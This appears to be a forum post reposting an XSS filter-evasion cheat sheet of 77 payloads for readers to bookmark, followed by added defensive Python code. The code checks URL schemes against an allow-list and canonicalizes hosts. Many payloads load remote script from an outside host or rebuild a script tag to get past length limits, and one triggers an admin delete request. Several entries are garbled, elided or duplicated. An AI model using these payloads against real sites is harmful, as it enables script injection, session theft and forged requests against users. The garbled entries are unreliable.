It seems t00ls has rather little material on XSS. I saw something good and copied it over, in case any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless domestically, since there is nowhere to exploit them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
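Most of the IMG, LINK, IFRAME, BGSOUND and TABLE vectors above are the same `javascript:` URL with the scheme disguised in different ways: mixed case (4), HTML character references with and without semicolons (5, 7 to 10), a tab, newline or carriage return inside the word (11 to 14), a null byte (17), or leading spaces and control characters (19). A filter that looks for the literal string "javascript:" misses every one of them. The defensive answer is to canonicalize first and then allow only the schemes you want, rather than deny-listing the ones you don't. The following Python is an added example written for this post, not code from the post or from the original cheat sheet; the allow-list, the `canonicalize_url_text` / `url_is_allowed` names and the sample inputs are all constructed here.

```python
import html
import re
from typing import Optional

# Schemes a user-supplied link may use. Anything else (javascript:, vbscript:,
# data:, ...) is rejected. Constructed policy for this example.
ALLOWED_SCHEMES = {"http", "https"}

# A scheme is a letter followed by letters, digits, "+", "." or "-", then ":".
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")

# Everything from NUL up to and including the space character.
_LEADING_JUNK = "".join(chr(c) for c in range(0x21))


def canonicalize_url_text(value: str) -> str:
    """Undo the disguises used on a URL scheme before it is inspected."""
    # (5), (7)-(10): decode HTML character references. html.unescape accepts
    # decimal and hex references with or without the trailing semicolon.
    decoded = html.unescape(value)
    # (19): browsers ignore leading whitespace and control characters.
    decoded = decoded.lstrip(_LEADING_JUNK)
    # (11)-(14), (17): tab, newline, carriage return and NUL inside the scheme
    # were skipped by the engines of the era, so drop them everywhere.
    decoded = re.sub(r"[\t\n\r\x00]", "", decoded)
    # (4): scheme matching is case-insensitive.
    return decoded.lower()


def detected_scheme(value: str) -> Optional[str]:
    """The scheme a browser would actually see, or None for a relative URL."""
    match = SCHEME_RE.match(canonicalize_url_text(value))
    return match.group(1) if match else None


def url_is_allowed(value: str) -> bool:
    """Allow absolute http(s) URLs and same-origin relative paths, nothing else."""
    norm = canonicalize_url_text(value)
    match = SCHEME_RE.match(norm)
    if match:
        return match.group(1) in ALLOWED_SCHEMES
    # No scheme: a relative path is fine, but "//host" (item 74) and "\\host"
    # are scheme-relative and point off-origin.
    return not norm.startswith(("//", "\\"))


# Constructed sample inputs modelled on the disguises listed in the post.
SAMPLES = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "&#x6A;avascript:alert('XSS')",
    "jav\tascript:alert('XSS')",
    "jav\nascript:alert('XSS')",
    " \x0e javascript:alert('XSS')",
    "java\x00script:alert('XSS')",
    "vbscript:msgbox('XSS')",
    "//3w.org/XSS/xss.js",
    "https://example.com/page",
    "/relative/path?x=1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "ALLOW" if url_is_allowed(sample) else "BLOCK"
        print(f"{verdict}  scheme={detected_scheme(sample)!r:<14} {sample!r}")
```

The point of the allow-list is that a new disguise for `javascript:` cannot help: unless the canonical scheme is exactly `http` or `https`, the link is rejected. If the attribute is later written into HTML, it still has to be attribute-encoded on output; this check only decides whether the value is an acceptable URL at all.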
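Items (70) to (73) and (76) show one and the same host written as a decimal integer, as hex octets, as octal octets, as a mix of all three, and with a trailing dot; all of these are legacy inet_aton() spellings that browsers resolve to the same address. A URL allow-list or deny-list that compares the raw host string treats each spelling as a different host, which is the gap these entries exploit. The following Python is an added example for this post, not code from the post or the original cheat sheet: it parses the legacy forms into a dotted-quad before any comparison. The names `parse_legacy_ipv4`, `canonical_host` and `same_host` and the sample URLs are constructed here.

```python
import ipaddress
from typing import Optional
from urllib.parse import urlsplit


def parse_legacy_ipv4(host: str) -> Optional[str]:
    """Interpret inet_aton()-style host spellings and return a dotted quad.

    Accepts 1 to 4 dot-separated parts; each part may be decimal, 0x hex or
    leading-zero octal; the last part fills all remaining bytes (so a single
    part is a 32-bit integer, as in item 70). Returns None if the host is not
    such a spelling (for example a normal DNS name).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isascii() and p.isalnum() for p in parts):
        return None
    values = []
    for part in parts:
        try:
            if part[:2].lower() == "0x":               # item 71: hex
                values.append(int(part[2:] or "0", 16))
            elif len(part) > 1 and part[0] == "0":     # item 72: octal
                values.append(int(part, 8))
            else:                                      # item 70: decimal
                values.append(int(part, 10))
        except ValueError:
            return None
    *head, last = values
    remaining = 4 - len(head)
    if any(v > 0xFF for v in head) or last >= 256 ** remaining:
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(addr))


def canonical_host(url: str) -> Optional[str]:
    """The host a browser would actually connect to, in a comparable form."""
    try:
        host = urlsplit(url).hostname  # lowercased; port and IPv6 brackets removed
    except ValueError:
        return None
    if not host:
        return None
    host = host.rstrip(".")            # item 76: "www.google.com." is the same name
    return parse_legacy_ipv4(host) or host


def same_host(url_a: str, url_b: str) -> bool:
    """Compare two URLs by canonical host, not by their raw text."""
    a, b = canonical_host(url_a), canonical_host(url_b)
    return a is not None and a == b


# Constructed sample URLs using the spellings from items 70-73 and 76.
SAMPLES = [
    "http://3232235521/",
    "http://0xc0.0xa8.0x00.0x01/",
    "http://0300.0250.0000.0001/",
    "http://0xC0A80001/",
    "http://66.000146.0x7.147/",
    "http://www.google.com./",
    "http://www.GOOGLE.com/",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample:<34} -> {canonical_host(sample)}")
```

Use `canonical_host` on both sides of any allow-list or deny-list comparison, and on any redirect or fetch target you validate server-side. Modern browsers canonicalize these spellings at URL-parse time (the WHATWG URL parser's IPv4 rules do the same job as `parse_legacy_ipv4`), so a check that looks at the string before parsing is checking something the browser will never see.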